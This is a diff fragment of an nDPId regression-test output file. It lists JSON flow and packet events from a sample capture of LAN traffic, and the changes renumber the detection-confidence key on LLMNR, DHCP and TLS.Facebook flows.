00915{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1470104408662,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":391,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":391,"pkt_l4_len":337,"thread_ts_msec":1470104408662,"pkt":"MzMAAAABwKC7c+tHht1gAAAAAVERgCABsDACFAEAwqC7\/\/5z60f\/AgAAAAAAAAAAAAAAAAAB9gD2AAFRTer\/D5NdoADAoLtz60cgAbAwAhQBAMKgu\/\/+c+tHAAACACcBREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFN3aXRjaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4xMC4wMTMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAoLtz60dCMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFQMFIxRDkwMDAwMjUAAAAAAAAAAAAAAAAAAAAAAAAAREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMCofR7\/\/wAAUG9ydCAxMAAgAbAwAhQBAMKgu\/\/+c+tHQA=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1470104409586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104409586,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD0rIU6wAgVxmmDQAAAAEAAAAAAAAGaXNhdGFwAAABAAE="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1470104409586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104409586,"pkt":"AQBeAAD8PKn0WgOECABFAAA0H6gAAAER9IDAqAPs4AAA\/NrrFOsAIGYJpg0AAAABAAAAAAAABmlzYXRhcAAAAQAB"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1470104409685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104409685,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD0rIU6wAgVxmmDQAAAAEAAAAAAAAGaXNhdGFwAAABAAE="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1470104409685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104409685,"pkt":"AQBeAAD8PKn0WgOECABFAAA0H6kAAAER9H\/AqAPs4AAA\/NrrFOsAIGYJpg0AAAABAAAAAAAABmlzYXRhcAAAAQAB"} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104410885,"flow_last_seen":1470104410885,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1470104410885,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -425,36 +425,36 @@ 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1470104410914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104410914,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsew8LBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgKoAAYABAAXABg="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104411327,"flow_last_seen":1470104411327,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104411327,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1470104411327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104411327,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7YAAAERvzfAqAUl4AAA\/NTqFOsAIqEiFTIAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104411327,"flow_last_seen":1470104411327,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104411327,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104411327,"flow_last_seen":1470104411327,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104411327,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1470104411735,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104411735,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7cAAAERvzbAqAUl4AAA\/NTqFOsAIqEiFTIAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1066,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104412556,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1066,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1470104412556,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":95,"pkt_l4_len":41,"thread_ts_msec":1470104412556,"pkt":"MzMAAQAD6LH8q\/uyht1gAAAAACkRAf6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAQAD\/DgU6wAp0RQMEAAAAAEAAAAAAAAPY2Flc2FyLXRoaW5rcGFkAAD\/AAE="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1066,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104412556,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1066,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104412556,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1067,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104412556,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1067,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1470104412556,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104412556,"pkt":"AQBeAAD86LH8q\/uyCABFAAA9eeQAAAERmPbAqAUx4AAA\/Pw4FOsAKTqNDBAAAAABAAAAAAAAD2NhZXNhci10aGlua3BhZAAA\/wAB"} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1067,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104412556,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1067,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104412556,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1070,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1470104412962,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":95,"pkt_l4_len":41,"thread_ts_msec":1470104412962,"pkt":"MzMAAQAD6LH8q\/uyht1gAAAAACkRAf6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAQAD\/DgU6wAp0RQMEAAAAAEAAAAAAAAPY2Flc2FyLXRoaW5rcGFkAAD\/AAE="} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1071,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1470104412962,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104412962,"pkt":"AQBeAAD86LH8q\/uyCABFAAA9eeYAAAERmPTAqAUx4AAA\/Pw4FOsAKTqNDBAAAAABAAAAAAAAD2NhZXNhci10aGlua3BhZAAA\/wAB"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104413679,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1470104413679,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104413679,"pkt":"\/\/\/\/\/\/\/\/SNIkYwreCABFAAFIfjcAAEARNZ3AqAUp\/\/\/\/\/wBEAEMBNOoXAQEGAAJEmkEAAIAAwKgFKQAAAAAAAAAAAAAAAEjSJGMK3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEIPQcBSNIkYwreDAhrZXZpbi1QQzwITVNGVCA1LjA3DQEPAwYsLi8fIXn5K\/z\/AAAAAAAAAAAAAAAA"} 
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104413679,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"kevin-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104413679,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"kevin-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}} 
00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1470104413815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104413815,"pkt":"TF4M6gNlYMVHBbyMCABFAAFIqYMAAEAR0r\/AqAUQwKh3AQBEAEMBNFvwAQEGABeXwM0AAAAAwKgFEAAAAAAAAAAAAAAAAGDFRwW8jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwkBAwYPd1\/8LC45AgXcPQcBYMVHBbyMMwQAdqcADAtNYWNCb29rLUFpcv8AAAAAAAAAAAAAAAAA"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7580000,"flow_min_l4_payload_len":1093,"flow_max_l4_payload_len":1093,"flow_tot_l4_payload_len":1093,"flow_avg_l4_payload_len":1093,"midstream":1,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1159,"pkt_l4_len":1125,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAAR5Xv9AAEAGm5bAqAUQHw1XJNFMAbv8UmzuBJ2iMIAYEABHkgAAAQEIChoPmUJf7iUmFwMDBEAsTuFq8CapSbqPXvcdxKrSs42tBtoxpkpEhbC8nI\/Z9Ti9iLIQZa5j5LW58IaLnxvFb3pZI+B1RxFJh1MX7hfwSESpGA\/xdeEaXYqNDQOsIrAzCG5XHIwlKsfFfn\/8RQrusMspya+fP6t\/Zg2Y6qSh9wcmn8mXJja+baLib9aevB6ce5XBs3a64vsRCgFs5NXASh55KEqD8yMaqdrRhlWFE6xGr6+SpmMLlVUwh48nOg1sBDe\/WYgSpLNk63+28tyTAwCIcOk3y10vOsyt7ZjgvztDnWOLtsn7\/6kMi3u2RdUB7eGGzM2NovPfgy\/qKgW2LAn44liW9WewObR4bp+dPFEvC0Y3+SW5bib2uvhBosFVLRK5YrZcwALZJXqqXhrrs6bu\/ljawzwGUMfLGQ2WSbwafdg9dJ73rdMEF1vEvfkETGUyJeWyPgg2G2DdxVtAlhAOni2Cb6JW3jV3kUvfm9gPSADxqT1QqjMQAvLuAsUt5WChMz4yp18RafOK\/1ZUrwxEzqELsHqkpHQf4ILnKSgg5+kGWAcGpm5BV27qLCy+WyMYEnVR9nevFTvw2OV3haLNTqpyfd4K7vOAMw+dbscVa9MHAeqcd7IQnXV8FbWdFXkC4wCM4E8hTvbfJf2QumZQ2fXLtiYd3sw8qoFpqMjmllDchFzska7DS7GVif4h6CnDNlZ4V+i1Eng9ELpwqlbXjyiEgMAhv7fPmI8e61K\/2gGY8OMdxcNsyD40PLGc9n2gJgcjUdhv3yk5lS0wyxma1JJ1Pa0sEMzvHL8CT6BpEzwkMJEMkciKtJ6VsJyummJhpN5MU9bS0CfSvwU0ARZvT+jD4m9Xd2enHnLuDwg4KR5SAhfN1vXfVfNlzPARDhSaBSDDpj8POKqEg5amwWHcBAQbXCOcOftYxPyyUfYlmBS91ssyfM9KHAYAPjuptOjnLxGz2x9TbNHcI4nTKruVWTV9ktQaEfrdpb\/HDqnCQBNGReenZ\/zWZ\/GfJml4Cm+qteZq9C64lEHb9+XokUZOr8X2s3gyZpMYfRa5jmhmO9xmHg7WJrK4eIDuKfpKwBJ058yTVyD7l0KDSW9GneGAGkjet6prc4idVI6G79csJZdQxaibq52QgAy0phRLTPkicoq0gLlZcIZm+Mml46cJhhEv0H26dA+KCoM5R5DwKEyBjuFs1QF3Y4+SDB+bc1Wt792AR8qtKWp6gbS96vJnCeIhTEA3KFLfapTzgvIE4vSB7KreGQj+tnmHbTp1DHeV+7y4PmFv5on7p4A6CEwD6f6fjePEHDfs2g0EYheGp2VL2NvXgnD2ikpgTUWxxOX40I6u2o6OTbP2RNpQ9m8KCHjwUMiisO3DyvkoNm8lZ6ZPWkev9k5y7txVdM8LiyyQoSG929RxmQGshqjjCdAsjAk+bbGLy98uGf3QTIpvsX0AlZ7fP\/qiRzGtQg=="} 
-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7580000,"flow_min_l4_payload_len":1093,"flow_max_l4_payload_len":1093,"flow_tot_l4_payload_len":1093,"flow_avg_l4_payload_len":1093,"midstream":1,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7580000,"flow_min_l4_payload_len":1093,"flow_max_l4_payload_len":1093,"flow_tot_l4_payload_len":1093,"flow_avg_l4_payload_len":1093,"midstream":1,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 